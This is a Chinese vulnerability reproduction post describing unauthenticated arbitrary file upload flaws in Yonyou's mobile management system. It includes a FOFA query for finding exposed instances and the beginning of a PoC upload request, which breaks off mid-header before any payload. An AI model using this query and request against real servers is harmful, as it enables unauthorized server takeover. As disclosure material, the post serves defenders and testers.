用友移动管理系统 多处文件上传漏洞复现

发布时间:2024年01月10日

0x01 产品简介

用友移动系统管理是用友公司推出的一款移动办公解决方案,旨在帮助企业实现移动办公、提高管理效率和员工工作灵活性。它提供了一系列功能和工具,方便用户在移动设备上管理和处理企业的系统和业务。

0x02 漏洞概述

用友移动管理系统 /maportal/appmanager/uploadIcon.do、/mobsm/common/upload等接口存在任意文件上传漏洞,未经授权攻击者通过漏洞上传任意文件,最终可以获取服务器权限。

0x03 复现环境

FOFA:app="用友-移动系统管理"

0x04 漏洞复现

PoC-1

POST /maportal/appmanager/uploadIcon.do HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: z
文章来源:https://blog.csdn.net/qq_41904294/article/details/135509486
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。